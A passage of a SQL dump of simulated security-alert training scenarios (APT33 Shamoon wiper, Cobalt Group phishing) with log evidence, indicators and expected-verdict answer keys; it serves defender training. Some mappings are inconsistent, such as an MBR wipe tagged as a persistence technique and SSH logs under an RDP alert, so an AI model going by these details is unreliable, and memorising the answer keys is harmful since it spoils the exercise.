4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:22:47Z\\\",\\\"event_id\\\":\\\"DLPE-20231005142247\\\",\\\"source_ip\\\":\\\"10.0.15.23\\\",\\\"destination_ip\\\":\\\"198.51.100.14\\\",\\\"username\\\":\\\"jdoe\\\",\\\"exfiltrated_files\\\":[{\\\"filename\\\":\\\"confidential_report_2023.pdf\\\",\\\"hash\\\":\\\"3cda541c8b2f5e5f5a438e3b2a8f3d4a\\\",\\\"size\\\":\\\"3.2MB\\\"}],\\\"related_domain\\\":\\\"malicious-exfiltration.com\\\",\\\"connection_protocol\\\":\\\"HTTPS\\\",\\\"detection_method\\\":\\\"anomalous data transfer\\\",\\\"description\\\":\\\"Large data transfer detected to external IP associated with known malicious domain.\\\",\\\"correlation_id\\\":\\\"C-20231005-XYZ123\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(802, 'Unusual RDP Logins Detected', 'high', 'Network Security Logs', 'APT33 initiated an attack by exploiting weak RDP credentials to gain unauthorized access to Saudi Aramco\'s network. Multiple login attempts were observed from a known malicious IP address.', 'Initial Access', 'T1078 - Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T02:23:45Z\",\"event_type\":\"RDP Login Attempt\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.15.87\",\"username\":\"admin_user\",\"success\":false,\"attempt_count\":5,\"associated_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"file_name\":\"rdp_brute_force.exe\",\"log_id\":\"123456789\"}', '2026-01-12 22:17:37', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple APT33 campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.15.87\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of Saudi Aramco network\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Audit\",\"verdict\":\"suspicious\",\"details\":\"Unexpected login attempts for this account\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash related to known APT33 malware\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"rdp_brute_force.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Threat Analysis\",\"verdict\":\"malicious\",\"details\":\"Executable used in brute force RDP attacks\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'advanced', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.450Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T02:23:45Z\\\",\\\"event_type\\\":\\\"RDP Login Attempt\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.15.87\\\",\\\"username\\\":\\\"admin_user\\\",\\\"success\\\":false,\\\"attempt_count\\\":5,\\\"associated_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"file_name\\\":\\\"rdp_brute_force.exe\\\",\\\"log_id\\\":\\\"123456789\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.450Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T02:23:45Z\\\",\\\"event_type\\\":\\\"RDP Login Attempt\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.15.87\\\",\\\"username\\\":\\\"admin_user\\\",\\\"success\\\":false,\\\"attempt_count\\\":5,\\\"associated_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"file_name\\\":\\\"rdp_brute_force.exe\\\",\\\"log_id\\\":\\\"123456789\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.450Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T02:23:45Z\\\",\\\"event_type\\\":\\\"RDP Login Attempt\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.15.87\\\",\\\"username\\\":\\\"admin_user\\\",\\\"success\\\":false,\\\"attempt_count\\\":5,\\\"associated_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"file_name\\\":\\\"rdp_brute_force.exe\\\",\\\"log_id\\\":\\\"123456789\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.450Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T02:23:45Z\\\",\\\"event_type\\\":\\\"RDP Login Attempt\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.15.87\\\",\\\"username\\\":\\\"admin_user\\\",\\\"success\\\":false,\\\"attempt_count\\\":5,\\\"associated_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"file_name\\\":\\\"rdp_brute_force.exe\\\",\\\"log_id\\\":\\\"123456789\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.450Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T02:23:45Z\\\",\\\"event_type\\\":\\\"RDP Login Attempt\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.15.87\\\",\\\"username\\\":\\\"admin_user\\\",\\\"success\\\":false,\\\"attempt_count\\\":5,\\\"associated_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"file_name\\\":\\\"rdp_brute_force.exe\\\",\\\"log_id\\\":\\\"123456789\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(803, 'Execution of Malicious Payload', 'critical', 'Endpoint Detection and Response (EDR) Systems', 'The attackers executed the Shamoon payload, initiating the process of wiping data from targeted workstations. This action is indicative of the destructive phase of the attack.', 'Execution', 'T1486 - Data Encrypted for Impact', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T14:32:45Z\",\"event_type\":\"process_execution\",\"host_ip\":\"192.168.1.45\",\"host_name\":\"workstation-23\",\"user\":\"jdoe\",\"process_name\":\"wiper.exe\",\"process_id\":4567,\"parent_process_name\":\"cmd.exe\",\"parent_process_id\":1234,\"command_line\":\"C:\\\\Windows\\\\System32\\\\wiper.exe -run\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"attacker_ip\":\"203.0.113.66\",\"attacker_domain\":\"malicious-actor.example.com\"}', '2026-01-12 22:17:37', '2026-02-16 17:59:30', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.66\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intelligence\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with previous Shamoon attacks.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"malicious\",\"details\":\"File hash associated with Shamoon malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"wiper.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"endpoint_detection\",\"verdict\":\"malicious\",\"details\":\"Executable known to be used by Shamoon malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(804, 'Registry Modification and Service Creation', 'high', 'Windows Registry Logs', 'APT33 has been detected modifying registry keys and creating a new service named \'WinSecureService\' to maintain the persistence of wiper malware across system reboots. The modification involved adding autorun registry entries and creating a service linked to the malicious binary \'wiper.exe\'.', 'Persistence', 'T1547.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T08:45:37Z\",\"event_id\":4657,\"user\":\"admin_user\",\"computer_name\":\"compromised-host.internal\",\"registry_key_path\":\"HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\",\"new_service_name\":\"WinSecureService\",\"service_executable\":\"C:\\\\Windows\\\\System32\\\\wiper.exe\",\"malware_hash\":\"9b0a1e3d4f5e6a7c8b9d0e1f2c3b4a5d\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.10\",\"action\":\"Registry Key Modified, Service Created\"}', '2026-01-12 22:17:37', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known APT33 command and control server.\"}},{\"id\":\"artifact_2\",\"type\":\"filename\",\"value\":\"wiper.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Associated with APT33 wiper campaign.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"9b0a1e3d4f5e6a7c8b9d0e1f2c3b4a5d\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known APT33 malware sample.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.452Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T08:45:37Z\\\",\\\"event_id\\\":4657,\\\"user\\\":\\\"admin_user\\\",\\\"computer_name\\\":\\\"compromised-host.internal\\\",\\\"registry_key_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\SOFTWARE\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"new_service_name\\\":\\\"WinSecureService\\\",\\\"service_executable\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wiper.exe\\\",\\\"malware_hash\\\":\\\"9b0a1e3d4f5e6a7c8b9d0e1f2c3b4a5d\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"action\\\":\\\"Registry Key Modified, Service Created\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.452Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T08:45:37Z\\\",\\\"event_id\\\":4657,\\\"user\\\":\\\"admin_user\\\",\\\"computer_name\\\":\\\"compromised-host.internal\\\",\\\"registry_key_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\SOFTWARE\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"new_service_name\\\":\\\"WinSecureService\\\",\\\"service_executable\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wiper.exe\\\",\\\"malware_hash\\\":\\\"9b0a1e3d4f5e6a7c8b9d0e1f2c3b4a5d\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"action\\\":\\\"Registry Key Modified, Service Created\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.452Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T08:45:37Z\\\",\\\"event_id\\\":4657,\\\"user\\\":\\\"admin_user\\\",\\\"computer_name\\\":\\\"compromised-host.internal\\\",\\\"registry_key_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\SOFTWARE\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"new_service_name\\\":\\\"WinSecureService\\\",\\\"service_executable\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wiper.exe\\\",\\\"malware_hash\\\":\\\"9b0a1e3d4f5e6a7c8b9d0e1f2c3b4a5d\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"action\\\":\\\"Registry Key Modified, Service Created\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.452Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T08:45:37Z\\\",\\\"event_id\\\":4657,\\\"user\\\":\\\"admin_user\\\",\\\"computer_name\\\":\\\"compromised-host.internal\\\",\\\"registry_key_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\SOFTWARE\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"new_service_name\\\":\\\"WinSecureService\\\",\\\"service_executable\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wiper.exe\\\",\\\"malware_hash\\\":\\\"9b0a1e3d4f5e6a7c8b9d0e1f2c3b4a5d\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"action\\\":\\\"Registry Key Modified, Service Created\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.452Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T08:45:37Z\\\",\\\"event_id\\\":4657,\\\"user\\\":\\\"admin_user\\\",\\\"computer_name\\\":\\\"compromised-host.internal\\\",\\\"registry_key_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\SOFTWARE\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"new_service_name\\\":\\\"WinSecureService\\\",\\\"service_executable\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wiper.exe\\\",\\\"malware_hash\\\":\\\"9b0a1e3d4f5e6a7c8b9d0e1f2c3b4a5d\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"action\\\":\\\"Registry Key Modified, Service Created\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(805, 'Increased Network Traffic and SMB Activity', 'high', 'Network Traffic Analysis', 'Anomalous increase in network traffic detected originating from internal workstation 192.168.1.45 to multiple endpoints within the network. The traffic involves SMB protocol usage consistent with lateral movement techniques aimed at propagating Shamoon malware. The connection was initiated using stolen credentials associated with user jdoe. A known malicious file hash was identified in the traffic.', 'Lateral Movement', 'T1021.002 - SMB/Windows Admin Shares', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:35:22Z\",\"source_ip\":\"192.168.1.45\",\"destination_ips\":[\"192.168.1.50\",\"192.168.1.51\",\"192.168.1.52\"],\"user\":\"jdoe\",\"protocol\":\"SMB\",\"malware_hash\":\"e99a18c428cb38d5f260853678922e03\",\"malicious_file\":\"spreadshamoon.exe\",\"external_attacker_ip\":\"203.0.113.5\",\"activity\":\"Increase in SMB traffic and file transfer attempts using stolen credentials\"}', '2026-01-12 22:17:37', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Source IP of the lateral movement within the network.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"external\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with previous attacks.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"hash database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Shamoon malware variant.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"compromised\",\"details\":\"User credentials used in unauthorized activities.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"spreadshamoon.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"malicious\",\"details\":\"Executable file used to propagate malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(806, 'MBR Overwrite Detected', 'critical', 'Disk Forensics', 'As the final step, the Shamoon wiper overwrites the MBR of infected systems, rendering them inoperable and displaying a burning American flag image. This operation is indicative of a politically motivated attack aimed at causing maximum disruption.', 'Destruction and Imagery Planting', 'T1547.001', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-05T14:23:39Z\",\"event_source\":\"disk_forensics\",\"event_id\":\"DF-2023-10001\",\"description\":\"Detected overwrite of Master Boot Record on host 192.168.10.45. Associated with Shamoon malware.\",\"host_ip\":\"192.168.10.45\",\"malware_hash\":\"4a5b6c7d8e9f0a1b2c3d4e5f6a7b8c9d\",\"malware_filename\":\"trksvr.exe\",\"attacker_ip\":\"185.53.177.20\",\"user\":\"admin_user\",\"action_taken\":\"MBR Overwrite\",\"political_imagery\":\"burning_flag.png\"}', '2026-01-12 22:17:37', '2026-02-16 18:00:24', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.10.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"4a5b6c7d8e9f0a1b2c3d4e5f6a7b8c9d\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known hash associated with Shamoon malware.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"trksvr.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Executable file used by Shamoon for MBR overwriting.\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"185.53.177.20\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known attacker IP associated with Shamoon operations.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'IR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.454Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:39Z\\\",\\\"event_source\\\":\\\"disk_forensics\\\",\\\"event_id\\\":\\\"DF-2023-10001\\\",\\\"description\\\":\\\"Detected overwrite of Master Boot Record on host 192.168.10.45. Associated with Shamoon malware.\\\",\\\"host_ip\\\":\\\"192.168.10.45\\\",\\\"malware_hash\\\":\\\"4a5b6c7d8e9f0a1b2c3d4e5f6a7b8c9d\\\",\\\"malware_filename\\\":\\\"trksvr.exe\\\",\\\"attacker_ip\\\":\\\"185.53.177.20\\\",\\\"user\\\":\\\"admin_user\\\",\\\"action_taken\\\":\\\"MBR Overwrite\\\",\\\"political_imagery\\\":\\\"burning_flag.png\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.454Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:39Z\\\",\\\"event_source\\\":\\\"disk_forensics\\\",\\\"event_id\\\":\\\"DF-2023-10001\\\",\\\"description\\\":\\\"Detected overwrite of Master Boot Record on host 192.168.10.45. Associated with Shamoon malware.\\\",\\\"host_ip\\\":\\\"192.168.10.45\\\",\\\"malware_hash\\\":\\\"4a5b6c7d8e9f0a1b2c3d4e5f6a7b8c9d\\\",\\\"malware_filename\\\":\\\"trksvr.exe\\\",\\\"attacker_ip\\\":\\\"185.53.177.20\\\",\\\"user\\\":\\\"admin_user\\\",\\\"action_taken\\\":\\\"MBR Overwrite\\\",\\\"political_imagery\\\":\\\"burning_flag.png\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.454Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:39Z\\\",\\\"event_source\\\":\\\"disk_forensics\\\",\\\"event_id\\\":\\\"DF-2023-10001\\\",\\\"description\\\":\\\"Detected overwrite of Master Boot Record on host 192.168.10.45. Associated with Shamoon malware.\\\",\\\"host_ip\\\":\\\"192.168.10.45\\\",\\\"malware_hash\\\":\\\"4a5b6c7d8e9f0a1b2c3d4e5f6a7b8c9d\\\",\\\"malware_filename\\\":\\\"trksvr.exe\\\",\\\"attacker_ip\\\":\\\"185.53.177.20\\\",\\\"user\\\":\\\"admin_user\\\",\\\"action_taken\\\":\\\"MBR Overwrite\\\",\\\"political_imagery\\\":\\\"burning_flag.png\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.454Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:39Z\\\",\\\"event_source\\\":\\\"disk_forensics\\\",\\\"event_id\\\":\\\"DF-2023-10001\\\",\\\"description\\\":\\\"Detected overwrite of Master Boot Record on host 192.168.10.45. Associated with Shamoon malware.\\\",\\\"host_ip\\\":\\\"192.168.10.45\\\",\\\"malware_hash\\\":\\\"4a5b6c7d8e9f0a1b2c3d4e5f6a7b8c9d\\\",\\\"malware_filename\\\":\\\"trksvr.exe\\\",\\\"attacker_ip\\\":\\\"185.53.177.20\\\",\\\"user\\\":\\\"admin_user\\\",\\\"action_taken\\\":\\\"MBR Overwrite\\\",\\\"political_imagery\\\":\\\"burning_flag.png\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.454Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:39Z\\\",\\\"event_source\\\":\\\"disk_forensics\\\",\\\"event_id\\\":\\\"DF-2023-10001\\\",\\\"description\\\":\\\"Detected overwrite of Master Boot Record on host 192.168.10.45. Associated with Shamoon malware.\\\",\\\"host_ip\\\":\\\"192.168.10.45\\\",\\\"malware_hash\\\":\\\"4a5b6c7d8e9f0a1b2c3d4e5f6a7b8c9d\\\",\\\"malware_filename\\\":\\\"trksvr.exe\\\",\\\"attacker_ip\\\":\\\"185.53.177.20\\\",\\\"user\\\":\\\"admin_user\\\",\\\"action_taken\\\":\\\"MBR Overwrite\\\",\\\"political_imagery\\\":\\\"burning_flag.png\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(807, 'Suspicious Login Attempt Detected', 'medium', 'Firewall Logs', 'The Cobalt Group initiated an attack attempt through a phishing campaign targeting bank employees. A suspicious login attempt was detected from an unfamiliar IP address.', 'Initial Access', 'T1566.001 - Spearphishing Attachment', 1, 'new', NULL, '{\"timestamp\":\"2023-10-01T10:15:30Z\",\"event_type\":\"login_attempt\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.5.23\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"username\":\"jdoe\",\"login_result\":\"failed\",\"attempted_filename\":\"invoice_2023.pdf\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"phishing_email_sender\":\"no-reply@fakebank.com\",\"phishing_email_subject\":\"Urgent: Invoice Attached\"}', '2026-01-12 22:20:16', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.5.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Bank\'s internal IP address\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"clean\",\"details\":\"Legitimate employee account\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"invoice_2023.pdf\",\"is_critical\":false,\"osint_result\":{\"source\":\"Malware 